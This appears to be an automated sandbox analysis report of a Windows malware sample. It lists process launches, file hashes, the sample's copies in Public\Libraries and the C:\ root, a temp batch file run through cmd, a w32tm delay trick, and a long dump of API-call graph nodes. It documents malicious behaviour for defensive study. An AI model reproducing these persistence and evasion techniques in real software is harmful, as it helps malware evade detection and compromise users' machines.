                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Antivirus matches:
                                                  • Detection: 70%, ReversingLabs
                                                  Has exited:true

                                                  Target ID:39
                                                  Start time:01:42:05
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Imagebase:0x820000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:42
                                                  Start time:01:42:08
                                                  Start date:02/01/2025
                                                  Path:C:\Chaindriver.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Chaindriver.exe"
                                                  Imagebase:0x380000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:44
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\cmd.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zsJdcY9yPm.bat"
                                                  Imagebase:0x7ff6f1620000
                                                  File size:289'792 bytes
                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:45
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7699e0000
                                                  File size:862'208 bytes
                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:46
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\chcp.com
                                                  Wow64 process (32bit):false
                                                  Commandline:chcp 65001
                                                  Imagebase:0x7ff70f330000
                                                  File size:14'848 bytes
                                                  MD5 hash:33395C4732A49065EA72590B14B64F32
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:47
                                                  Start time:01:42:12
                                                  Start date:02/01/2025
                                                  Path:C:\Windows\System32\w32tm.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                  Imagebase:0x7ff6502f0000
                                                  File size:108'032 bytes
                                                  MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                  Target ID:48
                                                  Start time:01:42:13
                                                  Start date:02/01/2025
                                                  Path:C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Users\Public\Libraries\NOFqHeDosUIopsPGLT.exe"
                                                  Imagebase:0x7b0000
                                                  File size:1'917'952 bytes
                                                  MD5 hash:64F81209BCCE8D36D800FEEC26D75990
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Has exited:true

                                                    Execution Graph

                                                    Execution Coverage:9.8%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:23.5%
                                                    Total number of Nodes:2000
                                                    Total number of Limit Nodes:52
                                                    execution_graph: node and edge listing of the rendered execution graph (function addresses with API-call annotations, e.g. 7ff652ef1208 LeaveCriticalSection, 7ff652ef1d3a SetEnvironmentVariableW); the raw graph data is not reproduced as text here.
20325->20331 20326->20197 20327 7ff652eef948 _get_daylight 11 API calls 20327->20331 20328 7ff652eea372 20330 7ff652eeb700 __free_lconv_mon 11 API calls 20328->20330 20329 7ff652ef1640 WideCharToMultiByte 20329->20331 20330->20326 20331->20326 20331->20327 20331->20328 20331->20329 20332 7ff652eeb700 __free_lconv_mon 11 API calls 20331->20332 20332->20331 20334 7ff652ef344d 20333->20334 20335 7ff652ee9f6a 20333->20335 20378 7ff652eebfd4 20334->20378 20339 7ff652ef377c GetEnvironmentStringsW 20335->20339 20340 7ff652ee9f6f 20339->20340 20341 7ff652ef37ac 20339->20341 20340->20317 20340->20318 20342 7ff652ef1640 WideCharToMultiByte 20341->20342 20343 7ff652ef37fd 20342->20343 20344 7ff652ef3804 FreeEnvironmentStringsW 20343->20344 20345 7ff652eee3ac _fread_nolock 12 API calls 20343->20345 20344->20340 20346 7ff652ef3817 20345->20346 20347 7ff652ef381f 20346->20347 20348 7ff652ef3828 20346->20348 20350 7ff652eeb700 __free_lconv_mon 11 API calls 20347->20350 20349 7ff652ef1640 WideCharToMultiByte 20348->20349 20352 7ff652ef384b 20349->20352 20351 7ff652ef3826 20350->20351 20351->20344 20353 7ff652ef384f 20352->20353 20354 7ff652ef3859 20352->20354 20355 7ff652eeb700 __free_lconv_mon 11 API calls 20353->20355 20356 7ff652eeb700 __free_lconv_mon 11 API calls 20354->20356 20357 7ff652ef3857 FreeEnvironmentStringsW 20355->20357 20356->20357 20357->20340 20360 7ff652eea055 20359->20360 20361 7ff652eef948 _get_daylight 11 API calls 20360->20361 20373 7ff652eea08b 20361->20373 20362 7ff652eea093 20363 7ff652eeb700 __free_lconv_mon 11 API calls 20362->20363 20364 7ff652ee9f8b 20363->20364 20364->20322 20365 7ff652eea106 20366 7ff652eeb700 __free_lconv_mon 11 API calls 20365->20366 20366->20364 20367 7ff652eef948 _get_daylight 11 API calls 20367->20373 20368 7ff652eea0f5 20527 7ff652eea25c 20368->20527 20370 7ff652eeb25c __std_exception_copy 37 API calls 20370->20373 20372 7ff652eeb700 __free_lconv_mon 11 API calls 20372->20362 20373->20362 20373->20365 20373->20367 
20373->20368 20373->20370 20374 7ff652eea12b 20373->20374 20375 7ff652eeb700 __free_lconv_mon 11 API calls 20373->20375 20376 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20374->20376 20375->20373 20377 7ff652eea13e 20376->20377 20379 7ff652eebfe5 FlsGetValue 20378->20379 20380 7ff652eec000 FlsSetValue 20378->20380 20381 7ff652eebffa 20379->20381 20382 7ff652eebff2 20379->20382 20380->20382 20383 7ff652eec00d 20380->20383 20381->20380 20384 7ff652eebff8 20382->20384 20385 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20382->20385 20386 7ff652eef948 _get_daylight 11 API calls 20383->20386 20398 7ff652ef3114 20384->20398 20387 7ff652eec075 20385->20387 20388 7ff652eec01c 20386->20388 20389 7ff652eec03a FlsSetValue 20388->20389 20390 7ff652eec02a FlsSetValue 20388->20390 20392 7ff652eec058 20389->20392 20393 7ff652eec046 FlsSetValue 20389->20393 20391 7ff652eec033 20390->20391 20394 7ff652eeb700 __free_lconv_mon 11 API calls 20391->20394 20395 7ff652eebcac _get_daylight 11 API calls 20392->20395 20393->20391 20394->20382 20396 7ff652eec060 20395->20396 20397 7ff652eeb700 __free_lconv_mon 11 API calls 20396->20397 20397->20384 20421 7ff652ef3384 20398->20421 20400 7ff652ef3149 20436 7ff652ef2e14 20400->20436 20403 7ff652ef3166 20403->20335 20404 7ff652eee3ac _fread_nolock 12 API calls 20405 7ff652ef3177 20404->20405 20406 7ff652ef317f 20405->20406 20408 7ff652ef318e 20405->20408 20407 7ff652eeb700 __free_lconv_mon 11 API calls 20406->20407 20407->20403 20408->20408 20443 7ff652ef34bc 20408->20443 20411 7ff652ef328a 20412 7ff652ee5cb4 _get_daylight 11 API calls 20411->20412 20414 7ff652ef328f 20412->20414 20413 7ff652ef32e5 20416 7ff652ef334c 20413->20416 20454 7ff652ef2c44 20413->20454 20417 7ff652eeb700 __free_lconv_mon 11 API calls 20414->20417 20415 7ff652ef32a4 20415->20413 20418 7ff652eeb700 __free_lconv_mon 11 API calls 20415->20418 20420 7ff652eeb700 __free_lconv_mon 11 API calls 20416->20420 20417->20403 20418->20413 20420->20403 20422 
7ff652ef33a7 20421->20422 20424 7ff652ef33b1 20422->20424 20469 7ff652ef11a8 EnterCriticalSection 20422->20469 20425 7ff652ef3423 20424->20425 20428 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 45 API calls 20424->20428 20425->20400 20429 7ff652ef343b 20428->20429 20431 7ff652ef3492 20429->20431 20433 7ff652eebfd4 50 API calls 20429->20433 20431->20400 20434 7ff652ef347c 20433->20434 20435 7ff652ef3114 65 API calls 20434->20435 20435->20431 20437 7ff652ee5788 45 API calls 20436->20437 20438 7ff652ef2e28 20437->20438 20439 7ff652ef2e34 GetOEMCP 20438->20439 20440 7ff652ef2e46 20438->20440 20441 7ff652ef2e5b 20439->20441 20440->20441 20442 7ff652ef2e4b GetACP 20440->20442 20441->20403 20441->20404 20442->20441 20444 7ff652ef2e14 47 API calls 20443->20444 20445 7ff652ef34e9 20444->20445 20447 7ff652ef3526 IsValidCodePage 20445->20447 20451 7ff652ef363f 20445->20451 20453 7ff652ef3540 __scrt_get_show_window_mode 20445->20453 20446 7ff652edc010 _wfindfirst32i64 8 API calls 20448 7ff652ef3281 20446->20448 20449 7ff652ef3537 20447->20449 20447->20451 20448->20411 20448->20415 20450 7ff652ef3566 GetCPInfo 20449->20450 20449->20453 20450->20451 20450->20453 20451->20446 20470 7ff652ef2f2c 20453->20470 20526 7ff652ef11a8 EnterCriticalSection 20454->20526 20471 7ff652ef2f69 GetCPInfo 20470->20471 20472 7ff652ef305f 20470->20472 20471->20472 20473 7ff652ef2f7c 20471->20473 20474 7ff652edc010 _wfindfirst32i64 8 API calls 20472->20474 20475 7ff652ef3c90 48 API calls 20473->20475 20476 7ff652ef30fe 20474->20476 20477 7ff652ef2ff3 20475->20477 20476->20451 20481 7ff652ef8c34 20477->20481 20480 7ff652ef8c34 54 API calls 20480->20472 20482 7ff652ee5788 45 API calls 20481->20482 20483 7ff652ef8c59 20482->20483 20486 7ff652ef8900 20483->20486 20487 7ff652ef8941 20486->20487 20488 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20487->20488 20492 7ff652ef898b 20488->20492 20489 7ff652ef8c09 20490 7ff652edc010 _wfindfirst32i64 8 API calls 20489->20490 20491 7ff652ef3026 
20490->20491 20491->20480 20492->20489 20493 7ff652eee3ac _fread_nolock 12 API calls 20492->20493 20494 7ff652ef8ac1 20492->20494 20495 7ff652ef89c3 20492->20495 20493->20495 20494->20489 20496 7ff652eeb700 __free_lconv_mon 11 API calls 20494->20496 20495->20494 20497 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20495->20497 20496->20489 20498 7ff652ef8a36 20497->20498 20498->20494 20517 7ff652eefd94 20498->20517 20501 7ff652ef8ad2 20504 7ff652eee3ac _fread_nolock 12 API calls 20501->20504 20505 7ff652ef8ba4 20501->20505 20507 7ff652ef8af0 20501->20507 20502 7ff652ef8a81 20502->20494 20503 7ff652eefd94 __crtLCMapStringW 6 API calls 20502->20503 20503->20494 20504->20507 20505->20494 20506 7ff652eeb700 __free_lconv_mon 11 API calls 20505->20506 20506->20494 20507->20494 20508 7ff652eefd94 __crtLCMapStringW 6 API calls 20507->20508 20509 7ff652ef8b70 20508->20509 20509->20505 20510 7ff652ef8b90 20509->20510 20511 7ff652ef8ba6 20509->20511 20512 7ff652ef1640 WideCharToMultiByte 20510->20512 20513 7ff652ef1640 WideCharToMultiByte 20511->20513 20514 7ff652ef8b9e 20512->20514 20513->20514 20514->20505 20515 7ff652ef8bbe 20514->20515 20515->20494 20516 7ff652eeb700 __free_lconv_mon 11 API calls 20515->20516 20516->20494 20518 7ff652eef9c0 __crtLCMapStringW 5 API calls 20517->20518 20519 7ff652eefdd2 20518->20519 20521 7ff652eefdda 20519->20521 20523 7ff652eefe80 20519->20523 20521->20494 20521->20501 20521->20502 20522 7ff652eefe43 LCMapStringW 20522->20521 20524 7ff652eef9c0 __crtLCMapStringW 5 API calls 20523->20524 20525 7ff652eefeae __crtLCMapStringW 20524->20525 20525->20522 20528 7ff652eea261 20527->20528 20532 7ff652eea0fd 20527->20532 20529 7ff652eea28a 20528->20529 20530 7ff652eeb700 __free_lconv_mon 11 API calls 20528->20530 20531 7ff652eeb700 __free_lconv_mon 11 API calls 20529->20531 20530->20528 20531->20532 20532->20372 20534 7ff652ef7410 20533->20534 20535 7ff652ef73f9 20533->20535 20534->20535 20538 7ff652ef741e 20534->20538 20536 7ff652ee5cb4 
_get_daylight 11 API calls 20535->20536 20537 7ff652ef73fe 20536->20537 20539 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20537->20539 20540 7ff652ee5788 45 API calls 20538->20540 20541 7ff652ef7409 20538->20541 20539->20541 20540->20541 20541->20209 20543 7ff652ee5788 45 API calls 20542->20543 20544 7ff652efa029 20543->20544 20547 7ff652ef9c80 20544->20547 20552 7ff652ef9cce 20547->20552 20548 7ff652edc010 _wfindfirst32i64 8 API calls 20549 7ff652ef82b5 20548->20549 20549->20209 20549->20236 20550 7ff652ef9d55 20551 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20550->20551 20556 7ff652ef9d59 20550->20556 20554 7ff652ef9ded 20551->20554 20552->20550 20553 7ff652ef9d40 GetCPInfo 20552->20553 20552->20556 20553->20550 20553->20556 20555 7ff652eee3ac _fread_nolock 12 API calls 20554->20555 20554->20556 20557 7ff652ef9e24 20554->20557 20555->20557 20556->20548 20557->20556 20558 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20557->20558 20559 7ff652ef9e92 20558->20559 20560 7ff652ef9f74 20559->20560 20561 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20559->20561 20560->20556 20562 7ff652eeb700 __free_lconv_mon 11 API calls 20560->20562 20563 7ff652ef9eb8 20561->20563 20562->20556 20563->20560 20564 7ff652eee3ac _fread_nolock 12 API calls 20563->20564 20565 7ff652ef9ee5 20563->20565 20564->20565 20565->20560 20566 7ff652ef03f0 _fread_nolock MultiByteToWideChar 20565->20566 20567 7ff652ef9f5c 20566->20567 20568 7ff652ef9f62 20567->20568 20569 7ff652ef9f7c 20567->20569 20568->20560 20571 7ff652eeb700 __free_lconv_mon 11 API calls 20568->20571 20576 7ff652eefc18 20569->20576 20571->20560 20573 7ff652ef9fbb 20573->20556 20575 7ff652eeb700 __free_lconv_mon 11 API calls 20573->20575 20574 7ff652eeb700 __free_lconv_mon 11 API calls 20574->20573 20575->20556 20577 7ff652eef9c0 __crtLCMapStringW 5 API calls 20576->20577 20578 7ff652eefc56 20577->20578 20579 7ff652eefc5e 20578->20579 20580 7ff652eefe80 __crtLCMapStringW 5 API calls 20578->20580 20579->20573 
20579->20574 20581 7ff652eefcc7 CompareStringW 20580->20581 20581->20579 20583 7ff652ef8cf1 20582->20583 20584 7ff652ef8d0a HeapSize 20582->20584 20585 7ff652ee5cb4 _get_daylight 11 API calls 20583->20585 20586 7ff652ef8cf6 20585->20586 20587 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20586->20587 20588 7ff652ef8d01 20587->20588 20588->20241 20590 7ff652ef13c1 20589->20590 20591 7ff652ef13cb 20589->20591 20592 7ff652eee3ac _fread_nolock 12 API calls 20590->20592 20593 7ff652ef13d0 20591->20593 20599 7ff652ef13d7 _get_daylight 20591->20599 20598 7ff652ef13c9 20592->20598 20596 7ff652eeb700 __free_lconv_mon 11 API calls 20593->20596 20594 7ff652ef13dd 20597 7ff652ee5cb4 _get_daylight 11 API calls 20594->20597 20595 7ff652ef140a HeapReAlloc 20595->20598 20595->20599 20596->20598 20597->20598 20598->20245 20599->20594 20599->20595 20600 7ff652ef43e0 _get_daylight 2 API calls 20599->20600 20600->20599 20602 7ff652ee9fd5 20601->20602 20603 7ff652ee9fd9 20601->20603 20602->20282 20614 7ff652eea380 20602->20614 20622 7ff652ef388c GetEnvironmentStringsW 20603->20622 20606 7ff652ee9ff2 20629 7ff652eea140 20606->20629 20607 7ff652ee9fe6 20608 7ff652eeb700 __free_lconv_mon 11 API calls 20607->20608 20608->20602 20611 7ff652eeb700 __free_lconv_mon 11 API calls 20612 7ff652eea019 20611->20612 20613 7ff652eeb700 __free_lconv_mon 11 API calls 20612->20613 20613->20602 20615 7ff652eea3a3 20614->20615 20620 7ff652eea3ba 20614->20620 20615->20282 20616 7ff652eef948 _get_daylight 11 API calls 20616->20620 20617 7ff652eea42e 20619 7ff652eeb700 __free_lconv_mon 11 API calls 20617->20619 20618 7ff652ef03f0 MultiByteToWideChar _fread_nolock 20618->20620 20619->20615 20620->20615 20620->20616 20620->20617 20620->20618 20621 7ff652eeb700 __free_lconv_mon 11 API calls 20620->20621 20621->20620 20623 7ff652ee9fde 20622->20623 20624 7ff652ef38b0 20622->20624 20623->20606 20623->20607 20625 7ff652eee3ac _fread_nolock 12 API calls 20624->20625 20627 7ff652ef38e7 memcpy_s 20625->20627 
20626 7ff652eeb700 __free_lconv_mon 11 API calls 20628 7ff652ef3907 FreeEnvironmentStringsW 20626->20628 20627->20626 20628->20623 20630 7ff652eea168 20629->20630 20631 7ff652eef948 _get_daylight 11 API calls 20630->20631 20641 7ff652eea1a3 20631->20641 20632 7ff652eeb700 __free_lconv_mon 11 API calls 20633 7ff652ee9ffa 20632->20633 20633->20611 20634 7ff652eea225 20635 7ff652eeb700 __free_lconv_mon 11 API calls 20634->20635 20635->20633 20636 7ff652eef948 _get_daylight 11 API calls 20636->20641 20637 7ff652eea214 20639 7ff652eea25c 11 API calls 20637->20639 20638 7ff652ef1344 _wfindfirst32i64 37 API calls 20638->20641 20640 7ff652eea21c 20639->20640 20643 7ff652eeb700 __free_lconv_mon 11 API calls 20640->20643 20641->20634 20641->20636 20641->20637 20641->20638 20642 7ff652eea248 20641->20642 20645 7ff652eeb700 __free_lconv_mon 11 API calls 20641->20645 20646 7ff652eea1ab 20641->20646 20644 7ff652eeb6b8 _wfindfirst32i64 17 API calls 20642->20644 20643->20646 20647 7ff652eea25a 20644->20647 20645->20641 20646->20632 20650 7ff652ef9be9 __crtLCMapStringW 20648->20650 20649 7ff652ef819e 20649->20308 20649->20309 20650->20649 20651 7ff652eefc18 6 API calls 20650->20651 20651->20649 19894 7ff652ed9d9b 19897 7ff652ed9da1 19894->19897 19895 7ff652edb850 12 API calls 19896 7ff652eda656 19895->19896 19897->19895 19897->19896 16223 7ff652eea715 16235 7ff652eeb188 16223->16235 16240 7ff652eebf00 GetLastError 16235->16240 16241 7ff652eebf24 FlsGetValue 16240->16241 16242 7ff652eebf41 FlsSetValue 16240->16242 16243 7ff652eebf3b 16241->16243 16259 7ff652eebf31 SetLastError 16241->16259 16244 7ff652eebf53 16242->16244 16242->16259 16243->16242 16271 7ff652eef948 16244->16271 16247 7ff652eebfcd 16250 7ff652eeb2bc __FrameHandler3::FrameUnwindToEmptyState 38 API calls 16247->16250 16248 7ff652eeb191 16262 7ff652eeb2bc 16248->16262 16255 7ff652eebfd2 16250->16255 16251 7ff652eebf80 FlsSetValue 16253 7ff652eebf9e 16251->16253 16254 7ff652eebf8c FlsSetValue 16251->16254 16252 
7ff652eebf70 FlsSetValue 16256 7ff652eebf79 16252->16256 16284 7ff652eebcac 16253->16284 16254->16256 16278 7ff652eeb700 16256->16278 16259->16247 16259->16248 16332 7ff652ef44a0 16262->16332 16272 7ff652eef959 _get_daylight 16271->16272 16273 7ff652eef9aa 16272->16273 16274 7ff652eef98e HeapAlloc 16272->16274 16289 7ff652ef43e0 16272->16289 16292 7ff652ee5cb4 16273->16292 16274->16272 16275 7ff652eebf62 16274->16275 16275->16251 16275->16252 16279 7ff652eeb705 RtlFreeHeap 16278->16279 16281 7ff652eeb734 16278->16281 16280 7ff652eeb720 GetLastError 16279->16280 16279->16281 16282 7ff652eeb72d __free_lconv_mon 16280->16282 16281->16259 16283 7ff652ee5cb4 _get_daylight 9 API calls 16282->16283 16283->16281 16318 7ff652eebb84 16284->16318 16295 7ff652ef4420 16289->16295 16301 7ff652eec078 GetLastError 16292->16301 16294 7ff652ee5cbd 16294->16275 16300 7ff652ef11a8 EnterCriticalSection 16295->16300 16302 7ff652eec0b9 FlsSetValue 16301->16302 16303 7ff652eec09c 16301->16303 16304 7ff652eec0cb 16302->16304 16307 7ff652eec0a9 16302->16307 16303->16302 16303->16307 16306 7ff652eef948 _get_daylight 5 API calls 16304->16306 16305 7ff652eec125 SetLastError 16305->16294 16308 7ff652eec0da 16306->16308 16307->16305 16309 7ff652eec0f8 FlsSetValue 16308->16309 16310 7ff652eec0e8 FlsSetValue 16308->16310 16311 7ff652eec104 FlsSetValue 16309->16311 16312 7ff652eec116 16309->16312 16313 7ff652eec0f1 16310->16313 16311->16313 16315 7ff652eebcac _get_daylight 5 API calls 16312->16315 16314 7ff652eeb700 __free_lconv_mon 5 API calls 16313->16314 16314->16307 16316 7ff652eec11e 16315->16316 16317 7ff652eeb700 __free_lconv_mon 5 API calls 16316->16317 16317->16305 16330 7ff652ef11a8 EnterCriticalSection 16318->16330 16366 7ff652ef4458 16332->16366 16371 7ff652ef11a8 EnterCriticalSection 16366->16371 19538 7ff652efbe14 19541 7ff652ee5b68 LeaveCriticalSection 19538->19541 21002 7ff652efbc8e 21003 7ff652efbc9e 21002->21003 21006 7ff652ee5b68 LeaveCriticalSection 21003->21006 19936 
7ff652eebd80 19937 7ff652eebd85 19936->19937 19938 7ff652eebd9a 19936->19938 19942 7ff652eebda0 19937->19942 19943 7ff652eebde2 19942->19943 19944 7ff652eebdea 19942->19944 19945 7ff652eeb700 __free_lconv_mon 11 API calls 19943->19945 19946 7ff652eeb700 __free_lconv_mon 11 API calls 19944->19946 19945->19944 19947 7ff652eebdf7 19946->19947 19948 7ff652eeb700 __free_lconv_mon 11 API calls 19947->19948 19949 7ff652eebe04 19948->19949 19950 7ff652eeb700 __free_lconv_mon 11 API calls 19949->19950 19951 7ff652eebe11 19950->19951 19952 7ff652eeb700 __free_lconv_mon 11 API calls 19951->19952 19953 7ff652eebe1e 19952->19953 19954 7ff652eeb700 __free_lconv_mon 11 API calls 19953->19954 19955 7ff652eebe2b 19954->19955 19956 7ff652eeb700 __free_lconv_mon 11 API calls 19955->19956 19957 7ff652eebe38 19956->19957 19958 7ff652eeb700 __free_lconv_mon 11 API calls 19957->19958 19959 7ff652eebe45 19958->19959 19960 7ff652eeb700 __free_lconv_mon 11 API calls 19959->19960 19961 7ff652eebe55 19960->19961 19962 7ff652eeb700 __free_lconv_mon 11 API calls 19961->19962 19963 7ff652eebe65 19962->19963 19968 7ff652eebc4c 19963->19968 19982 7ff652ef11a8 EnterCriticalSection 19968->19982 20687 7ff652ef2500 20698 7ff652ef8494 20687->20698 20699 7ff652ef84a1 20698->20699 20700 7ff652eeb700 __free_lconv_mon 11 API calls 20699->20700 20702 7ff652ef84bd 20699->20702 20700->20699 20701 7ff652eeb700 __free_lconv_mon 11 API calls 20701->20702 20702->20701 20703 7ff652ef2509 20702->20703 20704 7ff652ef11a8 EnterCriticalSection 20703->20704 20705 7ff652eeab00 20708 7ff652eeaa80 20705->20708 20715 7ff652ef11a8 EnterCriticalSection 20708->20715 20716 7ff652ee5b00 20717 7ff652ee5b0b 20716->20717 20725 7ff652eeff54 20717->20725 20738 7ff652ef11a8 EnterCriticalSection 20725->20738 16433 7ff652ee8670 16434 7ff652ee869e 16433->16434 16435 7ff652ee86d7 16433->16435 16437 7ff652ee5cb4 _get_daylight 11 API calls 16434->16437 16435->16434 16436 7ff652ee86dc FindFirstFileExW 16435->16436 16438 7ff652ee8745 
16436->16438 16439 7ff652ee86fe GetLastError 16436->16439 16440 7ff652ee86a3 16437->16440 16493 7ff652ee88e0 16438->16493 16442 7ff652ee8735 16439->16442 16443 7ff652ee8709 16439->16443 16444 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16440->16444 16446 7ff652ee5cb4 _get_daylight 11 API calls 16442->16446 16443->16442 16448 7ff652ee8725 16443->16448 16449 7ff652ee8713 16443->16449 16461 7ff652ee86ae 16444->16461 16446->16461 16447 7ff652ee88e0 _wfindfirst32i64 10 API calls 16450 7ff652ee876b 16447->16450 16452 7ff652ee5cb4 _get_daylight 11 API calls 16448->16452 16449->16442 16451 7ff652ee8718 16449->16451 16454 7ff652ee88e0 _wfindfirst32i64 10 API calls 16450->16454 16455 7ff652ee5cb4 _get_daylight 11 API calls 16451->16455 16452->16461 16453 7ff652edc010 _wfindfirst32i64 8 API calls 16456 7ff652ee86c2 16453->16456 16457 7ff652ee8779 16454->16457 16455->16461 16500 7ff652ef1344 16457->16500 16460 7ff652ee87a3 16462 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16460->16462 16461->16453 16463 7ff652ee87b7 16462->16463 16464 7ff652ee87e1 16463->16464 16466 7ff652ee8820 FindNextFileW 16463->16466 16465 7ff652ee5cb4 _get_daylight 11 API calls 16464->16465 16467 7ff652ee87e6 16465->16467 16468 7ff652ee8870 16466->16468 16469 7ff652ee882f GetLastError 16466->16469 16470 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16467->16470 16472 7ff652ee88e0 _wfindfirst32i64 10 API calls 16468->16472 16473 7ff652ee8863 16469->16473 16474 7ff652ee883a 16469->16474 16471 7ff652ee87f1 16470->16471 16477 7ff652edc010 _wfindfirst32i64 8 API calls 16471->16477 16476 7ff652ee8888 16472->16476 16475 7ff652ee5cb4 _get_daylight 11 API calls 16473->16475 16474->16473 16479 7ff652ee8844 16474->16479 16480 7ff652ee8856 16474->16480 16475->16471 16478 7ff652ee88e0 _wfindfirst32i64 10 API calls 16476->16478 16481 7ff652ee8804 16477->16481 16482 7ff652ee8896 16478->16482 16479->16473 16483 7ff652ee8849 16479->16483 16484 7ff652ee5cb4 _get_daylight 11 API calls 16480->16484 16485 
7ff652ee88e0 _wfindfirst32i64 10 API calls 16482->16485 16486 7ff652ee5cb4 _get_daylight 11 API calls 16483->16486 16484->16471 16487 7ff652ee88a4 16485->16487 16486->16471 16488 7ff652ef1344 _wfindfirst32i64 37 API calls 16487->16488 16489 7ff652ee88c2 16488->16489 16489->16471 16490 7ff652ee88ca 16489->16490 16491 7ff652eeb6b8 _wfindfirst32i64 17 API calls 16490->16491 16492 7ff652ee88de 16491->16492 16494 7ff652ee88fe FileTimeToSystemTime 16493->16494 16495 7ff652ee88f8 16493->16495 16496 7ff652ee890d SystemTimeToTzSpecificLocalTime 16494->16496 16497 7ff652ee8923 16494->16497 16495->16494 16495->16497 16496->16497 16498 7ff652edc010 _wfindfirst32i64 8 API calls 16497->16498 16499 7ff652ee875d 16498->16499 16499->16447 16501 7ff652ef1351 16500->16501 16502 7ff652ef135b 16500->16502 16501->16502 16507 7ff652ef1377 16501->16507 16503 7ff652ee5cb4 _get_daylight 11 API calls 16502->16503 16504 7ff652ef1363 16503->16504 16505 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 16504->16505 16506 7ff652ee8797 16505->16506 16506->16460 16506->16461 16507->16506 16508 7ff652ee5cb4 _get_daylight 11 API calls 16507->16508 16508->16504 20001 7ff652eda76d 20003 7ff652eda772 20001->20003 20002 7ff652edb850 12 API calls 20005 7ff652eda656 20002->20005 20003->20003 20008 7ff652eda8da 20003->20008 20010 7ff652eda443 20003->20010 20011 7ff652edb960 20003->20011 20006 7ff652edb960 12 API calls 20007 7ff652edabe8 20006->20007 20009 7ff652edb960 12 API calls 20007->20009 20008->20006 20008->20010 20009->20010 20010->20002 20010->20005 20012 7ff652edb9c0 20011->20012 20013 7ff652edbefa 20012->20013 20018 7ff652edb9df 20012->20018 20014 7ff652edc144 8 API calls 20013->20014 20015 7ff652edbeff 20014->20015 20016 7ff652edc010 _wfindfirst32i64 8 API calls 20017 7ff652edbedc 20016->20017 20017->20008 20018->20016 20797 7ff652edc2e0 20798 7ff652edc2f0 20797->20798 20814 7ff652eea95c 20798->20814 20800 7ff652edc2fc 20820 7ff652edc5d8 20800->20820 20802 7ff652edc8bc 7 API calls 20804 
7ff652edc395 20802->20804 20803 7ff652edc314 _RTC_Initialize 20812 7ff652edc369 20803->20812 20825 7ff652edc788 20803->20825 20806 7ff652edc329 20828 7ff652ee9dc8 20806->20828 20812->20802 20813 7ff652edc385 20812->20813 20815 7ff652eea96d 20814->20815 20816 7ff652eea975 20815->20816 20817 7ff652ee5cb4 _get_daylight 11 API calls 20815->20817 20816->20800 20818 7ff652eea984 20817->20818 20819 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20818->20819 20819->20816 20821 7ff652edc5e9 20820->20821 20824 7ff652edc5ee __scrt_release_startup_lock 20820->20824 20822 7ff652edc8bc 7 API calls 20821->20822 20821->20824 20823 7ff652edc662 20822->20823 20824->20803 20853 7ff652edc74c 20825->20853 20827 7ff652edc791 20827->20806 20829 7ff652ee9de8 20828->20829 20830 7ff652edc335 20828->20830 20831 7ff652ee9df0 20829->20831 20832 7ff652ee9e06 GetModuleFileNameW 20829->20832 20830->20812 20852 7ff652edc85c InitializeSListHead 20830->20852 20833 7ff652ee5cb4 _get_daylight 11 API calls 20831->20833 20836 7ff652ee9e31 20832->20836 20834 7ff652ee9df5 20833->20834 20835 7ff652eeb698 _invalid_parameter_noinfo 37 API calls 20834->20835 20835->20830 20868 7ff652ee9d68 20836->20868 20839 7ff652ee9e79 20840 7ff652ee5cb4 _get_daylight 11 API calls 20839->20840 20841 7ff652ee9e7e 